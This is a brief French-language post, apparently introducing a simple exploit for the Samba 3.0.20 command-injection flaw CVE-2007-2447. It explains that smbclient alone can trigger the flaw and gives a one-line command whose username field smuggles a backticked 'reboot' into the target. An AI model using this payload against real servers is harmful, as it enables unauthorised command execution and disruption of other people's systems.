
Un exploit simple pour CVE-2007-2447
Un exploit simple pour CVE-2007-2447, présent dans Samba 3.0.20.
Vous pouvez exploiter cette vulnérabilité avec encore moins que cela, par exemple, avec smbclient, mais je pense qu'il est difficile d'exécuter des commandes complexes, car beaucoup de caractères spéciaux sont probablement mangés, mais une commande simple (reboot dans ce cas) peut être passée comme ceci :
smbclient -L <target IP> --user="/=\`reboot\`" -N